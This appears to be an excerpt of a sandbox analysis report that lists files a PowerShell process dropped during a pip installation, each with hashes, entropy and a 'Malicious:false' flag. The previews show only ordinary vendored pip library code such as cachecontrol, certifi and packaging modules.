                              SSDEEP:48:edD9UBAkmuFrX3OoXL4pUn3xlyU6s42iS2z1ua:erUOPZ6L4qn3xlyUG+O
                              MD5:8EDD71460ED2677EC024AFC481147ED8
                              SHA1:5A316A3F8AFD8D6ACC37AA36341E273F3D8FE1BE
                              SHA-256:AD0A0CAC7F3AE6E496D0363854F773C1F0E7B421F770F19C77C9B918C674930F
                              SHA-512:38A7B4247BB1A3267F9707DEAABC8C9D86F598C769FEE154DF8868A4BF78737C65F77FDECE9B3264A88CD49B0E3E6744A510F451ECE7CE734E76FB808106FB74
                              Malicious:false
                              Preview:........=.Cfj.........................^.....d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...annotations)...datetime..timezone)...TYPE_CHECKING)...BaseCache)...Redisc.....................N.....e.Z.d.Z.d.d...Z.d.d...Z...d...............d.d...Z.d.d...Z.d.d...Z.d.d...Z.y.)...RedisCachec...........................|.|._.........y...N)...conn)...selfr....s.... .wC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/caches/redis_cache.py..__init__z.RedisCache.__init__....s..................c.....................8.....|.j...................j...................|.........S.r....).r......get..r......keys.... r....r....z.RedisCache.get....s..........y.y.}.}.S..!..!r....Nc..........................|.s.|.j...................j...................|.|...........y.t.........|.t.................r{t.........j...................t.........j...........................}.|.j.....................|.j..............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5352
                              Entropy (8bit):4.5310311547028475
                              Encrypted:false
                              SSDEEP:96:qcfKVC6+gjZRGpxpLdzPCvhk68hT3EBZVQ0PDHdQSTD1617:qgi+YShLdzPYYT+ZfH/D1W7
                              MD5:A0392FBE7C6A00DAC7915C652EF1439F
                              SHA1:9A65CFBE44F8B9C4D63BC4C1B7E48785000831D9
                              SHA-256:DF3F0058A0FEBDF29E889A88CCB989C8862D476C9DE93B21DEED53C8B450A084
                              SHA-512:115A80FBEE84CAFCB6B09547A62F9AB85233B65A663D0F9D715D5F7607A314EDB044FBC6E7384A8A25759DC65B1F2B6F884B8415290788BAA8DBD0892DE4452D
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..import hashlib.import os.from textwrap import dedent.from typing import IO, TYPE_CHECKING..from pip._vendor.cachecontrol.cache import BaseCache, SeparateBodyBaseCache.from pip._vendor.cachecontrol.controller import CacheController..if TYPE_CHECKING:. from datetime import datetime.. from filelock import BaseFileLock...def _secure_open_write(filename: str, fmode: int) -> IO[bytes]:. # We only want to write to this file, so open it in write only mode. flags = os.O_WRONLY.. # os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only. # will open *new* files.. # We specify this because we want to ensure that the mode we pass is the. # mode of the file.. flags |= os.O_CREAT | os.O_EXCL.. # Do not follow symlinks to prevent someone from making a symlink that. # we follow and insecurely open a cache file.. if hasattr(os, "O_NO
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1386
                              Entropy (8bit):4.566143866650669
                              Encrypted:false
                              SSDEEP:24:VO7tKxttZO2dc9TAHJiPZSBIqfWRNmmi9TeuHJOp7Rk6RMP+in81KS:o7GtU9TYJi+IqfWNm7peuHYVk6MP+1KS
                              MD5:FEFE321269EFACC26B40436D7FF65295
                              SHA1:4049DD3D0F66A44F5FF886D4177DFC9CCB83DC03
                              SHA-256:F6B9AAC2D62EFE58D5916EBFA0BA9B0BB11A5FF6BC613FF22EE9DAF9E4B4760A
                              SHA-512:87331B1EC32D54A10CD86A4222BAA0F35284E3899CBF07A6BC46D079B0B20F788606CFF381CD88012BCB6CB584C4EC4C37971D6E77AB654A2C60C8642ED63F15
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations...from datetime import datetime, timezone.from typing import TYPE_CHECKING..from pip._vendor.cachecontrol.cache import BaseCache..if TYPE_CHECKING:. from redis import Redis...class RedisCache(BaseCache):. def __init__(self, conn: Redis[bytes]) -> None:. self.conn = conn.. def get(self, key: str) -> bytes | None:. return self.conn.get(key).. def set(. self, key: str, value: bytes, expires: int | datetime | None = None. ) -> None:. if not expires:. self.conn.set(key, value). elif isinstance(expires, datetime):. now_utc = datetime.now(timezone.utc). if expires.tzinfo is None:. now_utc = now_utc.replace(tzinfo=None). delta = expires - now_utc. self.conn.setex(key, int(delta.total_seconds()), value). else:. self.conn.setex(key, expires, va
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):18384
                              Entropy (8bit):4.325418238484077
                              Encrypted:false
                              SSDEEP:192:imWeGuWXURXpdFnVQOV5EeGhwTpZMUXdZRo4URfWkEVhMZReiL7gZ2+jvB:imfGjAnVQgOIpFtKskEVhMZRegM2+jZ
                              MD5:024143284455A6479B08DAC28CF5E997
                              SHA1:27DD3070D55DC49060B35B8880A31EE4FE97D14F
                              SHA-256:91E08503765A3556964F01DDE85D73A9685BE2FCAF371FD4BD9BA8E6221831FA
                              SHA-512:129889D0FEB5D525A0BB8E1455DBA2F00A75FE962A967C1E1563E1D3077F3F0039E477D59EB0095FAB2DE500D0A111160EC499B8E0A4E9D0470606543F1B9704
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0..""".The httplib2 algorithms ported for use with requests..""".from __future__ import annotations..import calendar.import logging.import re.import time.from email.utils import parsedate_tz.from typing import TYPE_CHECKING, Collection, Mapping..from pip._vendor.requests.structures import CaseInsensitiveDict..from pip._vendor.cachecontrol.cache import DictCache, SeparateBodyBaseCache.from pip._vendor.cachecontrol.serialize import Serializer..if TYPE_CHECKING:. from typing import Literal.. from pip._vendor.requests import PreparedRequest. from pip._vendor.urllib3 import HTTPResponse.. from pip._vendor.cachecontrol.cache import BaseCache..logger = logging.getLogger(__name__)..URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")..PERMANENT_REDIRECT_STATUSES = (301, 308)...def parse_uri(uri: str) -> tuple[str, str, str, str, str]:. """Parses a URI using the regex given
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4292
                              Entropy (8bit):4.43121045074475
                              Encrypted:false
                              SSDEEP:48:o7zK5w8xH3Ik0BcYV4Q9z76G5Md0YnZqCT+OdDkTV4Fl4tDiSKaHLFHEKR3nqTE+:XwjgGO/8VvRK+Rnjq
                              MD5:6EA86F71B320920D475B9387ECCBA092
                              SHA1:0EA30FC3F74DC1424F3638908B8E02270667FC40
                              SHA-256:493B6D1A620F06F673B766F9D5D50EC28597E5CADC302A4A64E8AC3377F904D7
                              SHA-512:1CA27961486D141F73AA65DDF86E9CE30447B62D690C52D14CF02BBDE9F20129B0DC94FAD66C9021E4613823247AF8DE0B88405F88D8C56B22C0B9F483A1A2F1
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..import mmap.from tempfile import NamedTemporaryFile.from typing import TYPE_CHECKING, Any, Callable..if TYPE_CHECKING:. from http.client import HTTPResponse...class CallbackFileWrapper:. """. Small wrapper around a fp object which will tee everything read into a. buffer, and when that file is closed it will execute a callback with the. contents of that buffer... All attributes are proxied to the underlying file object... This class uses members with a double underscore (__) leading prefix so as. not to accidentally shadow an attribute... The data is stored in a temporary file until it is all available. As long. as the temporary files directory is disk-based (sometimes it's a. memory-backed-``tmpfs`` on Linux), data will be unloaded to disk if memory. pressure is high. For small files the disk usually won't be used at all,. it'll
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4828
                              Entropy (8bit):4.6960667056195815
                              Encrypted:false
                              SSDEEP:48:o7btfYt2IK96HGJgNISZb50c21dRgoR9bNwz1jJKd8+/64dPlNZn17dvoV+iqibt:LGkISqrD9Fx6KtLMV/hWtji
                              MD5:BFA110CCDD88D448F34008B114A06282
                              SHA1:C43016E83B44A6190CB42A3DF0597737DAA8CC77
                              SHA-256:7DD15B93D5BC21E2EB8ED788CFF7CAE268F61C3FD8EC239717651CF138234F57
                              SHA-512:1C705193282051C716FFDDA8762A15432F0ECF58EDBF175F15C10F15B57102D20D3AB1127E436CF2668B817C9B321938BD1F883453D68E934257D37C70C95023
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..import calendar.import time.from datetime import datetime, timedelta, timezone.from email.utils import formatdate, parsedate, parsedate_tz.from typing import TYPE_CHECKING, Any, Mapping..if TYPE_CHECKING:. from pip._vendor.urllib3 import HTTPResponse..TIME_FMT = "%a, %d %b %Y %H:%M:%S GMT"...def expire_after(delta: timedelta, date: datetime | None = None) -> datetime:. date = date or datetime.now(timezone.utc). return date + delta...def datetime_to_header(dt: datetime) -> str:. return formatdate(calendar.timegm(dt.timetuple()))...class BaseHeuristic:. def warning(self, response: HTTPResponse) -> str | None:. """. Return a valid 1xx warning header value describing the cache. adjustments... The response is provided too allow warnings like 113. http://tools.ietf.org/html/rfc7234#section-5.5.4 where we need. to expli
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):7173
                              Entropy (8bit):4.398922671210376
                              Encrypted:false
                              SSDEEP:96:Hc32ClhlwADUXM/J5NtZkdkMq5YCrICQmEta09LDyOypIIHzjdVkzKdRt:8mYWAwXq5Nt+dQYCOtY09LDgTRYyv
                              MD5:60068BE6762DF18FC9AE2CB34347FBD5
                              SHA1:44D988345F283E229D17ED63A52CE6C10BF2803B
                              SHA-256:D1D1DE31A0F0CAC54002719596130E3F8B43962A2180D2B427193FCEC3A25B1C
                              SHA-512:6196A4CC4865AB8BA859700F2413F0CEF883CA515AAA8911EAED4909689CF058A35267240AEAE6C0E4CF57978CAE14448A5D493F7A65E634D7F2AB46E952FCA5
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..import io.from typing import IO, TYPE_CHECKING, Any, Mapping, cast..from pip._vendor import msgpack.from pip._vendor.requests.structures import CaseInsensitiveDict.from pip._vendor.urllib3 import HTTPResponse..if TYPE_CHECKING:. from pip._vendor.requests import PreparedRequest...class Serializer:. serde_version = "4".. def dumps(. self,. request: PreparedRequest,. response: HTTPResponse,. body: bytes | None = None,. ) -> bytes:. response_headers: CaseInsensitiveDict[str] = CaseInsensitiveDict(. response.headers. ).. if body is None:. # When a body isn't passed in, we'll read the response. We. # also update the response with a new file handler to be. # sure it acts as though it was never read.. body = response.read(decode_content=False). respons
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1417
                              Entropy (8bit):4.715722887208466
                              Encrypted:false
                              SSDEEP:24:VO7SO6FhdDqzdcM3Oq1ndDfnA1ud/dXOFxWHXClwGTj+G2Vq8y3sLVX2Rxze:o7aZcvTd1XOFxWHXc7uby3sL2xze
                              MD5:5C04D764C34888FE64CF31011D0F6FAD
                              SHA1:B18A7CF7FAFCB793F2FA944B155C690B209960CA
                              SHA-256:86C19CEE0F101904D3FB87FCB60CF700CE6AC12720E853B405274B491744BE95
                              SHA-512:4BE6ED09F57EDC71BFD35398B1EA172C5827DED854E0DF5F8643C2C57156060B73D8D202480AEA82AECF507FD8FBAF0C3050EB8BECBD7FC4CEFCA479D3B65AC1
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..from typing import TYPE_CHECKING, Collection..from pip._vendor.cachecontrol.adapter import CacheControlAdapter.from pip._vendor.cachecontrol.cache import DictCache..if TYPE_CHECKING:. from pip._vendor import requests.. from pip._vendor.cachecontrol.cache import BaseCache. from pip._vendor.cachecontrol.controller import CacheController. from pip._vendor.cachecontrol.heuristics import BaseHeuristic. from pip._vendor.cachecontrol.serialize import Serializer...def CacheControl(. sess: requests.Session,. cache: BaseCache | None = None,. cache_etags: bool = True,. serializer: Serializer | None = None,. heuristic: BaseHeuristic | None = None,. controller_class: type[CacheController] | None = None,. adapter_class: type[CacheControlAdapter] | None = None,. cacheable_methods: Collection[str] | None = None,.) -> requests.Session:. cache =
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):94
                              Entropy (8bit):4.506263389110343
                              Encrypted:false
                              SSDEEP:3:1LGzbQbAwLSkTRFo+HGip4TjLvUV4v:1LcQbjrRJGA4TfUGv
                              MD5:81BE1B668C56F4B8D902694FCD10457F
                              SHA1:1BBC25E63E4DCCE182CC165B4761C9B2819A0CF1
                              SHA-256:2FF8FE774918B80FCCCC0DBFDA1ADA175A2F7FA293E834EAB91755DE9690C0E9
                              SHA-512:45BC81F68F3C88DFBB6435F1A3592A704C99D889A544A75393DD8F9EB3184792950A7E4CB908FA66DDEDF794BFE890365D8B5FC754393FBB6E77EAAC1243751C
                              Malicious:false
                              Preview:from .core import contents, where..__all__ = ["contents", "where"].__version__ = "2023.07.22".
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):255
                              Entropy (8bit):4.488945307809837
                              Encrypted:false
                              SSDEEP:6:JW6rdruXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWcdrCQYWuSZWFdQhu
                              MD5:49689CF432641C277156F1B5E119BB03
                              SHA1:94DE655E7E05B44B77EFBB710287FE7AC57BFE4E
                              SHA-256:D64DC2AFDE6F0B1C464460E58EB5B7C0C76965D2F73617F4BB59FE936A9DB026
                              SHA-512:88850F5DF40F8D51920E4F12632CB4E7A96C8F76E7737A058F74239C7A0C27F4A30187C64EDB4890B5156CC44AC4D567E95CA5734D4B0C1FA49F153E6989E6E0
                              Malicious:false
                              Preview:import argparse..from pip._vendor.certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):328
                              Entropy (8bit):5.37736070377711
                              Encrypted:false
                              SSDEEP:6:rKtqAIvEG/RnCl7+ixBRNetGn23d6oArea1yq4R6IaktyCOH:+tnfGW7n3RNetvIma1yq4Rjakty7H
                              MD5:0E9F4ECB30D434C334A0126B618CBA2B
                              SHA1:8D9A1773AEF241A98D659FF61AA179C8691D6846
                              SHA-256:ABDFFCCD02735CC26B4592B759C46AC2FEA56DA923C45EC6B88885800A01C103
                              SHA-512:E2374350F8D6E113DE01B87B3A22CD83E8230172D678964FA5AB58474730CAF928FE84EA96A01A8F9ABFD850D814C9F96EED9E2A20CC536FCF48BDF2D2F4354C
                              Malicious:false
                              Preview:........=.Cf^......................... .....d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.y.)......)...contents..wherer....r....z.2023.07.22N)...corer....r......__all__..__version__........hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/certifi/__init__.py..<module>r........s...........!....w..........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):655
                              Entropy (8bit):5.100119575158967
                              Encrypted:false
                              SSDEEP:12:MctIs7ZJrsc3YWaUPA6X/gV+y9vIma1yuBask9sLuEG:MctR7ZJ4RJ6XYLR3yyFfKBG
                              MD5:000915CA769A5A675837402778EC8C98
                              SHA1:13CBCB3EA298BDED01E17940867D2DF3CA75A6FD
                              SHA-256:AF866D4A4A0AB2C720095B64C24564408016EE8E5E05BCAD0A86BF76ED3ED16F
                              SHA-512:8E272D01A207B7CF7E530373B9A924126A363B6CA709E7B2715ACB43841053ADE5FF52A78B2C8E0A1771E185E6DC1F9BCDF14305F0C36040652AE2588B4ECC08
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.Z.d.d.l.m.Z.m.Z.....e.j...........................Z.e.j...................d.d.d.............e.j...........................Z.e.j...................r...e...e...................y...e...e...................y.)......N)...contents..wherez.-cz.--contents..store_true)...action)...argparse..pip._vendor.certifir....r......ArgumentParser..parser..add_argument..parse_args..args..print........hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/certifi/__main__.py..<module>r........sX............./.. .... .. .."............D.,.|.....<..................=.=....(.*.......%.'.Nr....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2859
                              Entropy (8bit):5.022506098009568
                              Encrypted:false
                              SSDEEP:48:3N4NPdCq1E1tyi+IkMXKe9wn7/gSR1Cszn1te503U34y:34Pvi1Qdszmnzga37k3
                              MD5:3B794845BD753F51197DAFBFFE61E8C1
                              SHA1:70F035B0A0AD0842153162E3D542E2F47157849C
                              SHA-256:AF6EC2C0D8239712613EDE7788C9BBE3F59E5F91C05BF1526B928A620F8D9A39
                              SHA-512:017FB854F93560F42986C882C7D3E652DC28471770F865C229CA40D1AD49A93B525FDCC55EACE0A9BAA4ABF300CE5E9156C47BE9B3A37C9D8E7934123CB4130D
                              Malicious:false
                              Preview:........=.Cf..........................6.....d.Z.d.d.l.Z.e.j...................d.k\..r.d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d...Z.d.e.f.d...Z.y.e.j...................d.k\..r.d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d...Z.d.e.f.d...Z.y.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j$..................e.f.....Z.e.e.d.f.....Z.....d.d.e.d.e.d.e.d.e.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.y.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N)...........)...as_file..files..returnc..........................t..........@t.........t.........d.........j...................d.................a.t.........t.........j...................................a.t.........S...N..pip._vendor.certifi..cacert.pem)..._CACERT_PATHr....r......joinpath.._CACERT_CTX..str..__enter__........dC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/certifi/core.py..wherer........s@.................".%.(=.">."G."G..."U..V.K....{..4..4..6..7.L......r....c..................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):8487
                              Entropy (8bit):4.821794705939232
                              Encrypted:false
                              SSDEEP:192:FxPaUwnyxKz3Qg94YnHlwlsWGjgJUR4ko739C:FxPaUayxKz3QwHlFW9Az+39C
                              MD5:54536DFF99AD209486558F4D75F5572E
                              SHA1:996AA3D6EDAF2166B1D48525CB6BB39CC4D2996B
                              SHA-256:00904E718F0EAB4918739EF42AEB8F4E4BEEAA302586E7DA13673DB0251B9BAE
                              SHA-512:A28378E1ED0BC4BCD8E9B7F9F9DCF9BE59A9B37424D54883325E311342E1FB53155DBD7341D33A842674BF85CEF8A8FAD4567F638A7B4735179B1C048404626D
                              Malicious:false
                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import operator.import os.import platform.import sys.from typing import Any, Callable, Dict, List, Optional, Tuple, Union..from pip._vendor.pyparsing import ( # noqa: N817. Forward,. Group,. Literal as L,. ParseException,. ParseResults,. QuotedString,. ZeroOrMore,. stringEnd,. stringStart,.)..from .specifiers import InvalidSpecifier, Specifier..__all__ = [. "InvalidMarker",. "UndefinedComparison",. "UndefinedEnvironmentName",. "Marker",. "default_environment",.]..Operator = Callable[[str, str], bool]...class InvalidMarker(ValueError):. """. An invalid marker was found, users should refer to PEP 508.. """...class UndefinedComparison(ValueError):. """. An invalid operation was attempted on a value that doesn't support it.. """...class UndefinedEnviro
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4676
                              Entropy (8bit):5.0843400479498
                              Encrypted:false
                              SSDEEP:96:F8tf9oNRFpYRDjkIyzxNxP9TGYHX/U3dNLGNdfPe8zOUyIgru0Bh:FoMRjacavLCmIEuKh
                              MD5:04B21F77EFDFE2FD090405BA65E94C55
                              SHA1:76AF8951571138A6DFCDD80C7944836795727A52
                              SHA-256:36D0E53C1B688E99F52140BCE623233CDB149AE7E3A529709CD03E5DBE26E4D0
                              SHA-512:94BF50592BC6822E4DDF8015DB795C45E870C50299F2C293C5044018D75B6724574D85ED01E71626796D0353D6A4635B40DBB49FCFD8AFB23A87ED97A6DBF63A
                              Malicious:false
                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import re.import string.import urllib.parse.from typing import List, Optional as TOptional, Set..from pip._vendor.pyparsing import ( # noqa. Combine,. Literal as L,. Optional,. ParseException,. Regex,. Word,. ZeroOrMore,. originalTextFor,. stringEnd,. stringStart,.)..from .markers import MARKER_EXPR, Marker.from .specifiers import LegacySpecifier, Specifier, SpecifierSet...class InvalidRequirement(ValueError):. """. An invalid requirement was found, users should refer to PEP 508.. """...ALPHANUM = Word(string.ascii_letters + string.digits)..LBRACKET = L("[").suppress().RBRACKET = L("]").suppress().LPAREN = L("(").suppress().RPAREN = L(")").suppress().COMMA = L(",").suppress().SEMICOLON = L(";").suppress().AT = L("@").suppress()..PUNCTUATION = Word("-_.").IDENTIFIER_END
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):30110
                              Entropy (8bit):4.322002453359518
                              Encrypted:false
                              SSDEEP:768:ZKP01L5VlEpRuhdwhOuh0Iul8vwcKwbmVX:Z0qLT9Iul87KwC1
                              MD5:7ACAFE408D6D5DD64238FD689638B177
                              SHA1:04FFE4F1C2E6D8796AE64B8D3CCD1B9791F31445
                              SHA-256:2D1434905B07AE5E6A7DC14D10426B20562C9C81D05095D8F5F22C6A44EBAEA1
                              SHA-512:B3CBE5FD1627F46F3BED6B5D12341D45F42070B5ACB37266A6884D2D32E422672F656C00E99AA56894DDC12398E9F76D46C4089095DF6C225E5A37F2E5D30F2F
                              Malicious:false
                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import abc.import functools.import itertools.import re.import warnings.from typing import (. Callable,. Dict,. Iterable,. Iterator,. List,. Optional,. Pattern,. Set,. Tuple,. TypeVar,. Union,.)..from .utils import canonicalize_version.from .version import LegacyVersion, Version, parse..ParsedVersion = Union[Version, LegacyVersion].UnparsedVersion = Union[Version, LegacyVersion, str].VersionTypeVar = TypeVar("VersionTypeVar", bound=UnparsedVersion).CallableOperator = Callable[[ParsedVersion, str], bool]...class InvalidSpecifier(ValueError):. """. An invalid specifier was found, users should refer to PEP 440.. """...class BaseSpecifier(metaclass=abc.ABCMeta):. @abc.abstractmethod. def __str__(self) -> str:. """. Returns the str representation of thi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):15699
                              Entropy (8bit):4.672788770491736
                              Encrypted:false
                              SSDEEP:384:F1dQiA/tDvve/XYdoSwddAhy85lV37oQYKMKEpXlp1tzeVze2XzuWCUDxfvc33:Hd6dvYYdDwddAhy85lV37oQ3D6Xlpnz/
                              MD5:E38B04681F4E31B77B316C978F6749BD
                              SHA1:1A2CECEDF2686B5DE23BEB435957D92894BC990E
                              SHA-256:966B2718D889F02E03FCF7FD3DB334AA06D9BC3F64981F65A590505196B747F6
                              SHA-512:6EEE7A6B90D1676B18EAA84FA010B348207BC88B7DC206696EBA87F85B33CFCED6E297E757A95891B609D7E9647B377001507853C8121D93739D20ADAEEF26A2
                              Malicious:false
                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import logging.import platform.import sys.import sysconfig.from importlib.machinery import EXTENSION_SUFFIXES.from typing import (. Dict,. FrozenSet,. Iterable,. Iterator,. List,. Optional,. Sequence,. Tuple,. Union,. cast,.)..from . import _manylinux, _musllinux..logger = logging.getLogger(__name__)..PythonVersion = Sequence[int].MacVersion = Tuple[int, int]..INTERPRETER_SHORT_NAMES: Dict[str, str] = {. "python": "py", # Generic.. "cpython": "cp",. "pypy": "pp",. "ironpython": "ip",. "jython": "jy",.}..._32_BIT_INTERPRETER = sys.maxsize <= 2 ** 32...class Tag:. """. A representation of the tag triple for a wheel... Instances are considered immutable and thus are hashable. Equality checking. is also supported.. """.. __slots__ = ["_interpreter",
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4200
                              Entropy (8bit):4.722653608189815
                              Encrypted:false
                              SSDEEP:96:FxdJdP1B7ynoaWBo3EQrdip7ARAfb90Cni6excWscJY:Fbb6aTBNAPC/2r3JY
                              MD5:359296260A63D16F5149CCDD7AE70762
                              SHA1:5979C6B8353210E327B4689A66207C56A7C8E3D1
                              SHA-256:7498DE6ADDC14BE4D89F546B505570B9F50C6AC6EDCCB7D8468CBF1D710D7854
                              SHA-512:F91A368431FCF74F3214DAC61427A3A81188EED8ECD2DD8F3036EC32BF149B0C34837EC965C4A4102B64E37F649DF4E90FE4B4104CB46E68B17079B52C5C9401
                              Malicious:false
                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import re.from typing import FrozenSet, NewType, Tuple, Union, cast..from .tags import Tag, parse_tag.from .version import InvalidVersion, Version..BuildTag = Union[Tuple[()], Tuple[int, str]].NormalizedName = NewType("NormalizedName", str)...class InvalidWheelFilename(ValueError):. """. An invalid wheel filename was found, users should refer to PEP 427.. """...class InvalidSdistFilename(ValueError):. """. An invalid sdist filename was found, users should refer to the packaging user guide.. """..._canonicalize_regex = re.compile(r"[-_.]+").# PEP 427: The build number must start with a digit.._build_tag_regex = re.compile(r"(\d+)(.*)")...def canonicalize_name(name: str) -> NormalizedName:. # This is taken from PEP 503.. value = _canonicalize_regex.sub("-", name).lower(). return cast
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):14665
                              Entropy (8bit):4.534429034326713
                              Encrypted:false
                              SSDEEP:384:FpB0O1ceOvOvEYj7XYzStXzEjlrr6UcMn:10reOvOvEYj7ozStXzQlrr6Ub
                              MD5:8FB00E724A7AF8D0B43FA3365FD3EFF0
                              SHA1:161EDB467745642554AFF7EE33A3EB69FF9E7287
                              SHA-256:FDF2D136B16BC5870755FCA8F2F93D8FCB3A24CF0DFF1B12C5516BE91272728F
                              SHA-512:CC785380E70F1F716079D789DE11E4C6B1A5E20003BEB9871EFECB12C490D4EA64BA0F33D795C07D5DE94C2AC66B5802474158BF71358A258B82837BBC1855D3
                              Malicious:false
                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...import collections.import itertools.import re.import warnings.from typing import Callable, Iterator, List, Optional, SupportsInt, Tuple, Union..from ._structures import Infinity, InfinityType, NegativeInfinity, NegativeInfinityType..__all__ = ["parse", "Version", "LegacyVersion", "InvalidVersion", "VERSION_PATTERN"]..InfiniteTypes = Union[InfinityType, NegativeInfinityType].PrePostDevType = Union[InfiniteTypes, Tuple[str, int]].SubLocalType = Union[InfiniteTypes, int, str].LocalType = Union[. NegativeInfinityType,. Tuple[. Union[. SubLocalType,. Tuple[SubLocalType, str],. Tuple[NegativeInfinityType, SubLocalType],. ],. ...,. ],.].CmpKey = Tuple[. int, Tuple[int, ...], PrePostDevType, PrePostDevType, PrePostDevType, LocalType.].LegacyCmpKey = T
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):109364
                              Entropy (8bit):4.51837671683019
                              Encrypted:false
                              SSDEEP:1536:B7CnR4awuxw8KGoDZdjpUHJWqjYeJcE19P+Wzum/V/EQA:B7s/KGofj0LPZBRA
                              MD5:AFE85CE9802C5FCBE3C4B34DD5CC4736
                              SHA1:1626018903F5A6DFD41FB8D60891A84AA3351ADA
                              SHA-256:85301E2423586FB749B1E20356C60ADE63D07A9FE0A618F8B5087E6ECA57F1B8
                              SHA-512:FC7DB98286977CC8F68B8141F9E8A8ED87EAE8D3A956D4C4A1E4F9B6A06CE23DB7A219DB1FBA4E8C5E40ED4E0C4A776E0A28B76B7E076F015D81080C21C715D4
                              Malicious:false
